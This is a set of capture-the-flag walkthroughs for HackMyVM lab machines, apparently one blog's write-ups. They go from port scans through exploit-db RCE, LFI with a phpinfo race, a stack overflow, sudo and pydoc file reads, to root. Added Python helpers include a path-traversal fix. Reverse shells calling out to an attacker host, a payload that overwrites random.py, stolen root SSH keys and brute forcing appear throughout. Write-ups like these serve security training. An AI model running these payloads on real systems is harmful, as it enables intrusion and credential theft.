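    """Same idea as 'pattern search': where in the pattern does the value
    seen at [RSP] begin? That index is the distance from s1 to the return address."""
    idx = pattern.find(at_rsp[:width])
    if idx < 0:
        raise ValueError("[RSP] contents not found in pattern")
    return idx


def offset_from_frame(buf_rbp_offset, saved_rbp_size=8):
    """Derive the same distance from the disassembly: s1 = byte ptr -50h puts the
    buffer 0x50 bytes below rbp, and the saved rbp sits between it and the return address."""
    return buf_rbp_offset + saved_rbp_size


def le64(addr):
    """Little-endian encoding of a 64-bit address, as it must appear in memory."""
    return struct.pack("<Q", addr)


def utf8_length(text):
    """How many bytes a str of escapes really produces when printed as UTF-8:
    each code point >= 0x80 becomes two bytes."""
    return len(text.encode("utf-8"))


if __name__ == "__main__":
    print("offset via pattern search:", offset_from_pattern(PEDA_PATTERN, AT_RSP))
    print("offset via frame layout:  ", offset_from_frame(0x50))
    print("thief address, little-endian:", le64(0x555555555185))
    print("bytes printed for the str escape:", utf8_length("\x85\x51\x55\x55\x55\x55\x00\x00"))
```

When raw bytes must reach a program's stdin, build them with struct.pack and write them through sys.stdout.buffer rather than printing a str; the two agree only for values below 0x80.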

Write a reverse shell command into /home/hesiod/fire as user hesiod; remember to chmod +x so that prometheus has execute permission.

```bash
hesiod@titan:~$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > fire
hesiod@titan:~$ chmod +x fire
hesiod@titan:~$ ls -la fire
-rwxr-x--x 1 hesiod hesiod 36 Aug 18 06:05 fire
```

Then, back as user prometheus, use Python to generate the payload string and pwn sacrifice.

```bash
prometheus@titan:~$ python3 -c 'print("a"*87+"\x85\x51\x55\x55\x55\x55\x00\x00")' |./sacrifice
────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:47256.
id
uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
cd /root
id;hostname
uid=0(root) gid=0(root) groups=0(root),1001(prometheus)
titan
```

HackMyVm Doc Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Doc

Scan ports, only port 80 is open.

```bash
nmap -sV -sC -p- -oN ports.log 192.168.56.100
Nmap scan report for bah.hmv (192.168.56.100)
Host is up (0.00070s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: nginx/1.18.0
|_http-title: Online Traffic Offense Management System - PHP
```

Check port 80: it is an Online Traffic Offense Management System. Google for an exploit, and add doc.hmv to /etc/hosts.

https://www.exploit-db.com/exploits/50221

Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) 

Use the PoC to get a user shell.

```bash
~ (p2) python 50221.py
Example: http://example.com
Url: http://doc.hmv
Check Url ...
[+] Bypass Login
[+] Upload Shell
[+] Exploit Done!
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```


Because this shell is not fully functional, spawn another reverse shell.

```bash
$ nc 192.168.56.150 1234 -e /bin/bash
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:44802.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty;pty.spawn("/bin/bash")'
```
The password for user bella is found in initialize.php.

```bash
www-data@doc:~/html/traffic_offense$ cat initialize.php
cat initialize.php
<?php
$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');
if(!defined('base_url')) define('base_url','http://doc.hmv/');
if(!defined('base_app')) define('base_app', str_replace('\\','/',__DIR__).'/' );
if(!defined('dev_data')) define('dev_data',$dev_data);
if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");
if(!defined('DB_USERNAME')) define('DB_USERNAME',"bella");
if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"be114yTU");
if(!defined('DB_NAME')) define('DB_NAME',"doc");
?>
```

Escalate to user bella.

```bash
www-data@doc:~/html/traffic_offense$ su bella
su bella
Password: be114yTU

bella@doc:/var/www/html/traffic_offense$ id
id
uid=1000(bella) gid=1000(bella) groups=1000(bella),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
bella@doc:/var/www/html/traffic_offense$
```


Check local ports: port 21 is actually SSH, so forward it outside with socat.

```bash
bella@doc:/$ ss -ntlp
ss -ntlp
State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess
LISTEN 0      80         127.0.0.1:3306      0.0.0.0:*
LISTEN 0      511          0.0.0.0:80        0.0.0.0:*
LISTEN 0      128        127.0.0.1:21        0.0.0.0:*
LISTEN 0      511             [::]:80           [::]:*
bella@doc:/$ socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
socat TCP-LISTEN:5000,fork,reuseaddr tcp:127.0.0.1:21 &
[1] 571
```

Check sudo -l.

```bash
bella@doc:~$ sudo -l
Matching Defaults entries for bella on doc:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User bella may run the following commands on doc:
    (ALL : ALL) NOPASSWD: /usr/bin/doc
```


Disassemble doc; it actually runs pydoc3.9.

```asm
; Attributes: bp-based frame
; int __cdecl main(int argc, const char **argv, const char **envp)
public main
main proc near
; __unwind {
push    rbp
mov     rbp, rsp
lea     rdi, command    ; "/usr/bin/pydoc3.9 -p 7890"
call    _system
nop
pop     rbp
retn
; } // starts at 1135
main endp
```

Google for a pydoc exploit.

https://bugs.python.org/issue42988

Start the doc server.

```bash
bella@doc:/$ sudo doc
sudo doc
Server ready at http://localhost:7890/
Server commands: [b]rowser, [q]uit
server>
```

In another terminal, log in via SSH as user bella and fetch root's SSH key from the pydoc server.

```bash
~ ssh bella@192.168.56.100 -p 5000
bella@192.168.56.100's password:
...
Last login: Thu Aug 26 21:33:08 2021 from 127.0.0.1
bella@doc:~$ curl http://localhost:7890/getfile?key=/root/.ssh/id_rsa
...
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn
NhAAAAAwEAAQAAAYEA6EoSPtXiFtzobkdXCemyu+inUAHe1+tAWvDEEpUSOYXVTDZXUhsA
qJ0B8PP+/i2gJb4ROUpuDJ6e8Ca1UYJdKFX47f5g0BRM+S5ZLueQDjv66Di7MukuKaLzq7
LapI7QvuPNStnZsolvixn0urFfKBQWJ2x3DGXcZCUWx37G7Ip8FawmF7OAkD5+R+0PucRz
...
s1R6k834FA4RfIpakszn95GJQKVbuJrK/rbl3FVMJ/Q2RiiXPkEmfhoYJFSpp+8I9cJQkz
uQ1x5zlzTqI5n3AAAACHJvb3RAZG9jAQI=
-----END OPENSSH PRIVATE KEY-----
```
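The bug used here (bpo-42988) is a file-serving endpoint that opens whatever path the request names, and `sudo doc` is what makes it run as root. As an added example that is not the walkthrough's or pydoc's code, the block below shows the confinement half of the fix: every requested path, including absolute and percent-encoded ones, is resolved and must stay inside one directory. The served directory and file names are constructed for the demo; the other half of the fix, not running such a helper as root at all, needs no code.

```python
"""Added example (not from the walkthrough or pydoc): confining a
getfile?key=... style request to one served directory.
The directory and file names below are constructed for this demo.
"""
import os
import tempfile
from urllib.parse import unquote


class PathOutsideRoot(Exception):
    """The requested path resolves outside the served directory."""


def resolve_under_root(root, requested):
    """Map a request path to a filesystem path inside root, or raise."""
    root_real = os.path.realpath(root)
    # decode percent-encoding first so that %2e%2e/ is seen as ../
    rel = unquote(requested).lstrip("/")          # absolute paths become relative
    candidate = os.path.realpath(os.path.join(root_real, rel))
    # realpath also follows symlinks, so a link pointing outside root is refused
    if os.path.commonpath([root_real, candidate]) != root_real:
        raise PathOutsideRoot(requested)
    return candidate


def serve_file(root, requested):
    """Return the file's bytes only if it resolves inside root."""
    with open(resolve_under_root(root, requested), "rb") as f:
        return f.read()


def demo():
    """Exercise the check with one legitimate and three hostile request paths."""
    with tempfile.TemporaryDirectory() as doc_root:
        with open(os.path.join(doc_root, "index.txt"), "wb") as f:
            f.write(b"public doc\n")
        outcomes = {"index.txt": serve_file(doc_root, "index.txt")}
        hostile = (
            "/root/.ssh/id_rsa",                    # absolute path, as in the request above
            "../../../../etc/passwd",               # plain traversal
            "%2e%2e/%2e%2e/%2e%2e/etc/passwd",      # percent-encoded traversal
        )
        for req in hostile:
            try:
                serve_file(doc_root, req)
                outcomes[req] = "served"
            except PathOutsideRoot:
                outcomes[req] = "blocked"
            except FileNotFoundError:
                outcomes[req] = "not found inside root"
        return outcomes


if __name__ == "__main__":
    for req, outcome in demo().items():
        print(f"{req!r}: {outcome!r}")
```

The absolute path is not rejected outright; it is re-rooted under the served directory and then simply does not exist there, which is the behaviour a static file server should have.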

Log in via SSH as root.

```bash
~ ssh root@192.168.56.100 -p 5000 -i key
root@doc:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
doc
root@doc:~#
```

HackMyVm Bah Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Bah

Scan ports.

```bash
~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log
...
PORT     STATE SERVICE VERSION
80/tcp   open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: qdPM | Login
3306/tcp open  mysql   MySQL 5.5.5-10.5.11-MariaDB-1
...
```

Open port 80 in a web browser; it shows a qdPM v9.2 login panel. Googling shows it may leak credentials.

```text
# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
# Date: 03/08/2021
# Exploit Author: Leon Trappett (thepcn3rd)
# Vendor Homepage: https://qdpm.net/
# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
# Version: 9.2
# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4

The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
```

Download databases.yml to get the login name and password.

```bash
~ wget http://192.168.56.100/core/config/databases.yml
~ cat databases.yml
...
username: qpmadmin
password: "<?php echo urlencode('qpmpazzw') ; ?>"
```

Log in to port 3306 and get a URL list.

```bash
~ mysql -h 192.168.56.100 -p3306 -u qpmadmin -p
...
+----+-------------------------+
| id | url                     |
+----+-------------------------+
|  1 | http://portal.bah.hmv   |
|  2 | http://imagine.bah.hmv  |
|  3 | http://ssh.bah.hmv      |
|  4 | http://dev.bah.hmv      |
|  5 | http://party.bah.hmv    |
|  6 | http://ass.bah.hmv      |
|  7 | http://here.bah.hmv     |
|  8 | http://hackme.bah.hmv   |
|  9 | http://telnet.bah.hmv   |
| 10 | http://console.bah.hmv  |
| 11 | http://tmux.bah.hmv     |
| 12 | http://dark.bah.hmv     |
| 13 | http://terminal.bah.hmv |
+----+-------------------------+
13 rows in set (0.001 sec)
```

And a users list.

```bash
MariaDB [hidden]> select * from users;
+----+---------+---------------------+
| id | user    | password            |
+----+---------+---------------------+
|  1 | jwick   | Ihaveafuckingpencil |
|  2 | rocio   | Ihaveaflower        |
|  3 | luna    | Ihavealover         |
|  4 | ellie   | Ihaveapassword      |
|  5 | camila  | Ihaveacar           |
|  6 | mia     | IhaveNOTHING        |
|  7 | noa     | Ihaveflow           |
|  8 | nova    | Ihavevodka          |
|  9 | violeta | Ihaveroot           |
+----+---------+---------------------+
9 rows in set (0.001 sec)
```

Extract the host names from the url table into a wordlist and enumerate vhosts. Every name answers 200 and the sizes differ only by twice the length of the name (the host name is echoed in the default page), except party.bah.hmv, whose much smaller response is clearly a different page.

 ~ gobuster vhost -u bah.hmv  -w  dic                                                                    
 ===============================================================
 2021/08/22 10:38:10 Starting gobuster in VHOST enumeration mode
 ===============================================================
 Found: party.bah.hmv (Status: 200) [Size: 5216]
 Found: imagine.bah.hmv (Status: 200) [Size: 5659]
 Found: portal.bah.hmv (Status: 200) [Size: 5657]
 Found: hackme.bah.hmv (Status: 200) [Size: 5657]
 Found: telnet.bah.hmv (Status: 200) [Size: 5657]
 Found: dev.bah.hmv (Status: 200) [Size: 5651]    
 Found: ssh.bah.hmv (Status: 200) [Size: 5651]    
 Found: here.bah.hmv (Status: 200) [Size: 5653]  
 Found: ass.bah.hmv (Status: 200) [Size: 5651]    
 Found: console.bah.hmv (Status: 200) [Size: 5659]
 Found: tmux.bah.hmv (Status: 200) [Size: 5653]  
 Found: dark.bah.hmv (Status: 200) [Size: 5653]  
 Found: terminal.bah.hmv (Status: 200) [Size: 5661]
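
Added example, not part of the original walkthrough: the baseline comparison gobuster leaves to the eye, written out in Python so "returns the minimum size" becomes an explicit rule. It builds the wordlist from the url table and uses the gobuster sizes above as a fake fetcher so it runs offline; a real fetcher would send `GET /` with `Host: <name>` to 192.168.56.100 and return the body length. Function names and the 16-byte tolerance are my choices.

```python
import statistics
from typing import Callable, Dict, List, Tuple

# Host names from the url table above.
URLS = [
    "http://portal.bah.hmv", "http://imagine.bah.hmv", "http://ssh.bah.hmv",
    "http://dev.bah.hmv", "http://party.bah.hmv", "http://ass.bah.hmv",
    "http://here.bah.hmv", "http://hackme.bah.hmv", "http://telnet.bah.hmv",
    "http://console.bah.hmv", "http://tmux.bah.hmv", "http://dark.bah.hmv",
    "http://terminal.bah.hmv",
]

# Constructed fetcher data: the response sizes gobuster printed above.
FAKE_SIZES = {
    "party.bah.hmv": 5216, "imagine.bah.hmv": 5659, "portal.bah.hmv": 5657,
    "hackme.bah.hmv": 5657, "telnet.bah.hmv": 5657, "dev.bah.hmv": 5651,
    "ssh.bah.hmv": 5651, "here.bah.hmv": 5653, "ass.bah.hmv": 5651,
    "console.bah.hmv": 5659, "tmux.bah.hmv": 5653, "dark.bah.hmv": 5653,
    "terminal.bah.hmv": 5661,
}


def hostnames_from_urls(urls: List[str]) -> List[str]:
    """Turn the url column into a vhost wordlist (the 'dic' file above)."""
    names: List[str] = []
    for u in urls:
        name = u.split("://", 1)[-1].split("/", 1)[0]
        if name not in names:
            names.append(name)
    return names


def fake_fetch(host: str) -> int:
    """Stand-in for: send GET / with Host: <host> and return len(body)."""
    return FAKE_SIZES[host]


def find_outlier_vhosts(names: List[str], fetch: Callable[[str], int],
                        tolerance: int = 16) -> Tuple[Dict[str, int], List[str]]:
    """Request each name and flag those whose size is far from the median.

    The default page echoes the host name, so its length drifts by a few
    bytes per name.  Anything further than `tolerance` bytes from the
    median is not the default page.
    """
    sizes = {n: fetch(n) for n in names}
    median = statistics.median(sizes.values())
    outliers = [n for n, s in sizes.items() if abs(s - median) > tolerance]
    return sizes, outliers


if __name__ == "__main__":
    names = hostnames_from_urls(URLS)
    sizes, outliers = find_outlier_vhosts(names, fake_fetch)
    for n in names:
        print(f"{n:20} {sizes[n]}")
    print("distinct content:", outliers)
```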

Add party.bah.hmv to /etc/hosts and browse to it on port 80: it serves a web shell interface. Log in with the credentials from the yml file.


This web shell is usable as it is, so there is no need to spawn a reverse shell.

In /home there is another user, rocio. Switch to rocio with the password from the users table (Ihaveaflower).

 qpmadmin@bah:/home/rocio$ su rocio
 Password:
 rocio@bah:~$ id
 uid=1000(rocio) gid=1000(rocio) groups=1000(rocio),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Run pspy. One shellinaboxd command line stands out.

 2021/08/21 23:38:00 CMD: UID=107  PID=452    | /usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid -c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox --user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css --no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev

The shellinabox documentation explains the -s (service) format URL:USER:GROUP:CWD:CMD, so /devel:root:root:/:/tmp/dev means that a request to /devel runs /tmp/dev as user root, group root, with / as the working directory. /tmp is world-writable, so anyone on the box can supply that script.
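
Added example (my code, not the page's and not shellinabox's): parse the -s/--service definitions out of a shellinaboxd command line and flag any that run a command as root from a location other users can write to. The command line is the pspy output above reassembled into one string; the Service field names and the writability rule are mine.

```python
import os
import stat
from dataclasses import dataclass
from typing import Callable, List, Optional

# The pspy line from above, joined back into one string.
PSPY_CMDLINE = (
    "/usr/bin/shellinaboxd -q --background=/var/run/shellinaboxd.pid "
    "-c /var/lib/shellinabox -p 4200 -u shellinabox -g shellinabox "
    "--user-css Black on White:+/etc/shellinabox/options-enabled/00+Black on White.css,"
    "White On Black:-/etc/shellinabox/options-enabled/00_White On Black.css;"
    "Color Terminal:+/etc/shellinabox/options-enabled/01+Color Terminal.css,"
    "Monochrome:-/etc/shellinabox/options-enabled/01_Monochrome.css "
    "--no-beep --disable-ssl --localhost-only -s/:LOGIN -s /devel:root:root:/:/tmp/dev"
)


@dataclass
class Service:
    url: str
    user: Optional[str]   # None for the built-in LOGIN / SSH services
    group: Optional[str]
    cwd: Optional[str]
    cmd: Optional[str]


def parse_services(cmdline: str) -> List[Service]:
    """Extract every -s / --service definition from a shellinaboxd command line.

    shellinabox accepts URL:LOGIN, URL:SSH[:HOST] or URL:USER:GROUP:CWD:CMD;
    only the last form runs an arbitrary command.
    """
    tokens = cmdline.split()
    values: List[str] = []
    i = 0
    while i < len(tokens):
        t = tokens[i]
        if t in ("-s", "--service"):
            values.append(tokens[i + 1])
            i += 2
            continue
        if t.startswith("--service="):
            values.append(t[len("--service="):])
        elif t.startswith("-s") and len(t) > 2:
            values.append(t[2:])
        i += 1
    services: List[Service] = []
    for v in values:
        parts = v.split(":", 4)
        if len(parts) == 5:
            services.append(Service(*parts))
        else:
            services.append(Service(parts[0], None, None, None, None))
    return services


def world_writable(path: str) -> bool:
    try:
        st = os.stat(path)
    except OSError:
        return False
    return bool(st.st_mode & stat.S_IWOTH)


def risky_services(services: List[Service],
                   writable: Callable[[str], bool] = world_writable) -> List[Service]:
    """Services that run a command as root where the script, or the directory
    holding it, is writable by others: anyone who can reach the URL gets root."""
    out: List[Service] = []
    for s in services:
        if s.user != "root" or not s.cmd:
            continue
        script = s.cmd.split()[0]
        if writable(script) or writable(os.path.dirname(script) or "/"):
            out.append(s)
    return out


if __name__ == "__main__":
    svcs = parse_services(PSPY_CMDLINE)
    for s in svcs:
        print(s)
    # On the box /tmp is world-writable, so /devel is reported.
    print("risky:", risky_services(svcs))
```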

So we drop a reverse-shell command into /tmp/dev and make it executable.

 ~ echo 'nc 192.168.56.150 1234 -e /bin/bash' >/tmp/dev
 ~ chmod +x /tmp/dev

Visiting http://party.bah.hmv/devel/ in the browser triggers it, and the listener receives a root shell.

 ~ nc -nlvp 1234
 Ncat: Version 7.91 ( https://nmap.org/ncat )
 Ncat: Listening on :::1234
 Ncat: Listening on 0.0.0.0:1234
 Ncat: Connection from 192.168.56.100.
 Ncat: Connection from 192.168.56.100:59154.
 id
 uid=0(root) gid=0(root) groups=0(root)

HackMyVm Bunny Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Bunny

Scan ports.

~ nmap -sV -sC -p- 192.168.56.100  -oN ports.log                
 ...
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)                                      
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-server-header: Apache/2.4.38 (Debian)
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan dirs.

```bash
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log

/upload.php (Status: 200) [Size: 27305]
/password.txt (Status: 200) [Size: 537]
/index.php (Status: 200) [Size: 25]
/config.php (Status: 200) [Size: 24691]
/phpinfo.php (Status: 200) [Size: 95622]
```

Nothing interesting in those files. Next, fuzz index.php for a parameter name, hiding the 25-byte default response (--hh 25).

```bash
~ wfuzz -u 'http://192.168.56.100/index.php?FUZZ=/etc/passwd' --hh 25 -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt
=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================
000013357:   200        31 L     43 W       1508 Ch     "page"
```

Fuzz local file paths through the page parameter. This confirms the LFI, but no file with credentials turns up.

~ wfuzz -u 'http://192.168.56.100/index.php?page=FUZZ'  --hh 25  -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt                  
 =====================================================================
 ID           Response   Lines    Word       Chars       Payload
 =====================================================================
 000000001:   200        31 L     43 W       1508 Ch     "/etc/passwd"
 000000005:   200        231 L    1117 W     7249 Ch     "/etc/apache2/apache2.conf"
 000000004:   200        17 L     42 W       426 Ch      "/etc/anacrontab"
 000000015:   200        26 L     192 W      1067 Ch     "/etc/crontab"
 ...

We now have an LFI in index.php and a phpinfo page on a server with file_uploads = On. That is the well-known LFI-plus-phpinfo race: a multipart upload makes PHP write a temporary file, phpinfo() reveals its path in $_FILES, and the LFI includes the file before PHP deletes it at the end of the request.

Download the PoC from https://raw.githubusercontent.com/vulhub/vulhub/master/php/inclusion/exp.py and change the payload so it writes a reverse-shell stub to /tmp/g.

```python
PAYLOAD="""%s\r
<?php file_put_contents('/tmp/g', '<?php system("nc 192.168.56.150 1234 -e /bin/bash"); ?>')?>\r""" % TAG
```

Run the PoC. After a few dozen attempts the race is won and the stub is written to /tmp/g.

```bash
~ (p2) python exp.py 192.168.56.100 80
LFI With PHPInfo()
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Getting initial offset... found [tmp_name] at 137073
Spawning worker pool (10)...
51 / 1000
Got it! Shell created in /tmp/g

Woot! \m/
Shuttin' down...
```

Start a listener on port 1234 and include /tmp/g through the LFI.

```bash
~ curl 'http://192.168.56.100/index.php?page=/tmp/g'
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49970.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

Next, sudo -l shows www-data may run a script named magic in user chris's home as chris.

 www-data@bunny:/home/chris/lab$ sudo -l
 sudo -l
 Matching Defaults entries for www-data on bunny:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

 User www-data may run the following commands on bunny:
     (chris) NOPASSWD: /bin/bash /home/chris/lab/magic *
 www-data@bunny:/home/chris/lab$ cat magic
 cat magic
 #/bin/bash
 $1 $2 $3 -T -TT 'sh #'
 www-data@bunny:/home/chris/lab$

GTFOBins (https://gtfobins.github.io/gtfobins/zip/) shows that zip with -T -TT 'sh #' spawns a shell, which is exactly the option tail the magic script appends to its first three arguments.

 Shell

 It can be used to break out from restricted environments by spawning an interactive system shell.

     TF=$(mktemp -u)
     zip $TF /etc/hosts -T -TT 'sh #'
     rm $TF

Escalate to user chris.

 www-data@bunny:/home/chris/lab$ sudo -u chris /bin/bash /home/chris/lab/magic zip $(mktemp -u) /etc/hosts
   adding: etc/hosts (deflated 30%)
 $ id
 id
 uid=1000(chris) gid=1000(chris) groups=1000(chris),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)

Create /home/chris/.ssh, put our public key in authorized_keys with mode 600, and log in over SSH for a proper shell.

Search for writable files.

```bash
chris@bunny:~$ find / -writable -not -path "/proc*" 2>/dev/null
/home/chris
...
/usr/lib/python3.7/random.py
/tmp
...
```


/opt/pendu.py is owned by root and imports random, so the writable /usr/lib/python3.7/random.py is loaded whenever it runs.

```bash
chris@bunny:~$ cd /opt
chris@bunny:/opt$ ls -la
total 12
drwxr-x---  2 root chris 4096 Jul 31 10:25 .
drwxr-xr-x 18 root root  4096 Jul 31 09:00 ..
-rw-r--r--  1 root root  1993 Jul 31 10:14 pendu.py
chris@bunny:/opt$ cat pendu.py
import random
...
```

pspy shows root runs it periodically.

 2021/08/17 06:53:01 CMD: UID=0    PID=1236   | /bin/sh -c /usr/bin/python3.7 /opt/pendu.py

Write a Python reverse shell into random.py and wait for the job to fire. Overwriting the file this way breaks every other program on the box that imports random; appending the payload to the existing module instead would keep it working and be less disruptive.

```bash
chris@bunny:~$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.150",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /usr/lib/python3.7/random.py
chris@bunny:~$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:49976.
bash: cannot set terminal process group (1259): Inappropriate ioctl for device
bash: no job control in this shell
root@bunny:~# id;hostname;
id;hostname;
uid=0(root) gid=0(root) groups=0(root)
bunny
root@bunny:~#
```

HackMyVm Zen Walkthrough


https://hackmyvm.eu/machines/machine.php?vm=Zen

Scan ports.

nmap -sV -sC -p- -oN ports.log 192.168.56.100  
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey:
 |   2048 c3:a0:ac:5d:25:92:47:2c:f5:70:ba:1b:f0:a3:b9:67 (RSA)
 |   256 03:72:ad:7b:df:46:5d:b3:2a:9b:69:a9:c4:11:35:86 (ECDSA)
 |_  256 4b:a1:81:88:73:2a:a0:b6:5c:9f:30:d9:c9:7f:1f:3f (ED25519)
 80/tcp open  http    nginx 1.14.2
 | http-robots.txt: 9 disallowed entries
 | /albums/ /plugins/ /P@ssw0rd /themes/ /zp-core/
 |_/zp-data/ /page/search/ /uploaded/ /backup/
 |_http-server-header: nginx/1.14.2
 |_http-title: Galer\xC3\xADa
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel    

An HTML comment at the bottom of the main page gives the application name and version.

```bash
~ curl http://192.168.56.99
<!DOCTYPE html>
...
</body>
</html>
<!-- zenphoto version 1.5.7 -->
```


Searching for zenphoto 1.5.7 turns up an authenticated arbitrary file upload that leads to code execution.
         Authenticated arbitrary file upload to RCE

Product : Zenphoto
Affected : Zenphoto CMS - <= 1.5.7
Attack Type : Remote

login then go to plugins then go to uploader and press on the check box elFinder
then press apply , after that you go to upload then Files(elFinder) drag and drop
any malicious php code after that go to /uploaded/ and you're php code


Zenphoto through 1.5.7 is affected by authenticated arbitrary file
upload, leading to remote code execution. The attacker must navigate to
the uploader plugin, check the elFinder box, and then drag and drop
files into the Files(elFinder) portion of the UI. This can, for
example, place a .php file in the server's uploaded/ directory.

[Reference]
https://www.linkedin.com/in/abdulaziz-almisfer-22a7861ab/
https://twitter.com/3almisfer
https://github.com/azizalshammari/


robots.txt contains one odd entry, /P@ssw0rd, which looks like a password rather than a path.

Find the login panel of zenphoto at /zp-core/admin.php, login with admin:P@ssw0rd.

Enable the elFinder uploader as the advisory describes, upload a PHP reverse shell (r.php here), and request it to get a shell as www-data.

```bash
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.99.
Ncat: Connection from 192.168.56.99:38120.
Linux zen 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
 20:23:18 up 16 min,  0 users,  load average: 0.00, 0.02, 0.04
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
────────────────────────────────────────────────────────────────────────────────────────────────────────
~ curl http://192.168.56.99/backup/r.php
```

Found 3 users in home folder.

www-data@zen:/home$ ls -la
 ls -la
 total 20
 drwxr-xr-x  5 root      root      4096 Jun 14 03:45 .
 drwxr-xr-x 18 root      root      4096 Jun 14 03:19 ..
 drwxr-xr-x  2 hua       hua       4096 Jun 14 03:45 hua
 drwxr-xr-x  2 kodo      kodo      4096 Jun 14 03:24 kodo
 drwxr-xr-x  3 zenmaster zenmaster 4096 Jun 14 03:47 zenmaster

There is no obvious path from www-data to any of these users, so try SSH with the user names themselves as passwords (hydra's -e nsr tries an empty password, the login name and the login name reversed).

 ~ hydra -L names.txt -P names.txt -e nsr 192.168.56.99 ssh -t64 -F
 ...
 [DATA] attacking ssh://192.168.56.99:22/
 [22][ssh] host: 192.168.56.99   login: zenmaster   password: zenmaster

Log in as zenmaster and escalate to kodo through sudo.

```bash
zenmaster@zen:~$ sudo -l
Matching Defaults entries for zenmaster on zen:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User zenmaster may run the following commands on zen:
(kodo) NOPASSWD: /bin/bash
zenmaster@zen:~$ sudo -u kodo /bin/bash -p
```


